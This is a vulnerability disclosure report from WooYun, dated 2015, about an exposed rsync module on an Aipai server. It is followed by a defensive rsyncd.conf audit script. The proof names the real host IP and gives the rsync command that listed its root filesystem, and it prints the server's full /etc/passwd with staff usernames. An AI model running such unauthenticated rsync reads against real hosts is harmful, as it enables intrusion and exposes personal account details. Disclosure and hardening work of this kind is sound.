Vulnerability summary

Defect ID: wooyun-2015-0125448

Title: Unauthenticated rsync on an Aipai host allows reading the passwd file

Vendor: Aipai (爱拍)

Author: myhalo

Submitted: 2015-07-09 11:27

Fixed: 2015-08-24 16:10

Published: 2015-08-24 16:10

Type: Unauthorized access / permission bypass

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-09: Details sent to the vendor, awaiting vendor response
2015-07-10: Vendor confirmed; details disclosed to the vendor only
2015-07-20: Details disclosed to core white hats and relevant domain experts
2015-07-30: Details disclosed to regular white hats
2015-08-09: Details disclosed to intern white hats
2015-08-24: Details disclosed to the public

Brief description:

Scanning~~~

Detailed description:

(screenshot: 1.png)

IP: 121.10.245.222

Proof of vulnerability:

root@k:~# rsync 121.10.245.222::udr
drwxr-xr-x 4096 2015/04/13 17:34:59 .
lrwxrwxrwx 30 2015/03/23 19:41:10 initrd.img
lrwxrwxrwx 26 2015/03/23 19:41:10 vmlinuz
drwxr-xr-x 4096 2015/04/08 14:29:56 appex
drwxr-xr-x 4096 2015/03/25 15:03:27 bin
drwxr-xr-x 4096 2015/03/23 22:22:06 boot
drwxr-xr-x 4096 2015/04/13 17:34:59 data
drwxr-xr-x 3040 2015/03/25 11:09:19 dev
drwxr-xr-x 4096 2015/06/30 18:53:38 etc
drwxr-xr-x 4096 2015/06/11 14:13:59 home
drwxr-xr-x 4096 2015/03/25 15:09:25 lib
drwxr-xr-x 4096 2015/03/23 22:21:05 lib64
drwxr-xr-x 4096 2015/03/23 19:39:18 media
drwxr-xr-x 4096 2013/12/04 19:31:54 mnt
drwxr-xr-x 4096 2015/06/25 15:05:40 opt
dr-xr-xr-x 0 2015/03/25 11:09:11 proc
drwxr-xr-x 740 2015/07/08 17:39:13 run
drwxr-xr-x 4096 2015/03/23 22:29:51 sbin
drwxr-xr-x 4096 2012/06/10 14:35:49 selinux
drwxr-xr-x 4096 2015/04/27 15:00:43 srv
drwxr-xr-x 0 2015/03/25 11:09:13 sys
drwxrwxrwt 4096 2015/07/08 18:42:21 tmp
drwxr-xr-x 4096 2015/03/23 19:39:49 usr
drwxr-xr-x 4096 2015/03/23 22:23:24 var


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
snmp:x:103:106::/var/lib/snmp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
ntp:x:105:107::/home/ntp:/bin/false
messagebus:x:106:108::/var/run/dbus:/bin/false
zouguangxian:x:1000:1003::/home/zouguangxian:/bin/bash
zhajm:x:1001:1004::/home/zhajm:/bin/bash
hefalin:x:1002:1005::/home/hefalin:/bin/bash
oumingzhu:x:1003:1006::/home/oumingzhu:/bin/bash
liujin:x:1004:1007::/home/liujin:/bin/bash
zl:x:1005:1008::/home/zl:/bin/bash
salt:x:1006:1009::/home/salt:/bin/bash
zenoss:x:1007:1010::/home/zenoss:/bin/bash
clamav:x:1008:1011::/home/clamav:/bin/sh
rsyncer:x:1009:1012::/home/rsyncer:/bin/bash
chenbin:x:1010:1013::/home/chenbin:/bin/bash
jasxio:x:1011:1014::/home/jasxio:/bin/bash

Fix recommendation:

Ask the ops team.

Copyright notice: when reposting, please credit the source: myhalo@WooYun
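The fix above is terse. As an added illustration (not part of the original report), here is a small audit of an rsyncd.conf that flags modules with the weakness shown in the proof: a module exporting / with no `auth users` and no `hosts allow`, listable by anyone who can reach the port. The module name `udr` is taken from the report; the configuration content, the `backup` module and all values are constructed for the example.

```python
import configparser
from typing import Dict, List

# Constructed sample rsyncd.conf (an assumption, not the vendor's real config).
# "udr" mirrors the exposed module in the report; "backup" shows the settings
# that would have closed the hole (authentication, source restriction, no listing).
SAMPLE_RSYNCD_CONF = """\
uid = nobody
gid = nogroup
[udr]
    path = /
    read only = no
[backup]
    path = /srv/backup
    read only = yes
    list = no
    auth users = backupuser
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/8
"""

def audit_rsyncd_conf(text: str) -> Dict[str, List[str]]:
    """Return {module: [findings]} for every module whose settings expose it."""
    # rsync accepts indented options; strip them so configparser does not treat
    # them as continuation lines. Options before the first header are globals,
    # which rsync lets every module inherit, so parse them under a synthetic section.
    cleaned = "\n".join(line.strip() for line in text.splitlines())
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string("[__global__]\n" + cleaned)
    globals_ = dict(cp.items("__global__"))
    findings: Dict[str, List[str]] = {}
    for module in cp.sections():
        if module == "__global__":
            continue
        opts = {**globals_, **dict(cp.items(module))}
        problems = []
        if "auth users" not in opts:
            problems.append("no 'auth users': anyone who can reach the port may connect")
        if "hosts allow" not in opts:
            problems.append("no 'hosts allow': not restricted by source address")
        if opts.get("path", "").rstrip("/") == "":
            problems.append("path is '/': whole filesystem exported, /etc/passwd readable")
        if opts.get("read only", "yes").lower() in ("no", "false", "0"):
            problems.append("'read only = no': remote writes allowed")
        if opts.get("list", "yes").lower() in ("yes", "true", "1"):
            problems.append("'list = yes': module shows up in 'rsync host::'")
        if problems:
            findings[module] = problems
    return findings
```

Run it against /etc/rsyncd.conf on each host that exposes port 873; any module that appears in the result should gain `auth users`, `secrets file`, `hosts allow` and a narrow `path` before the service goes back online.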


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-07-10 16:09

Vendor reply:

Thanks for the feedback!

Latest status:

None yet


Vulnerability ratings:

Comments

  1. 2015-09-03 01:16 | _Thorns (Regular white hat | Rank: 882 | Vulns: 157 | buying WB at 1:5, unlimited [platform escrow])

    Can anyone explain how this was read?

  2. 2015-09-03 01:16 | _Thorns (Regular white hat | Rank: 882 | Vulns: 157 | buying WB at 1:5, unlimited [platform escrow])

    ...I see now.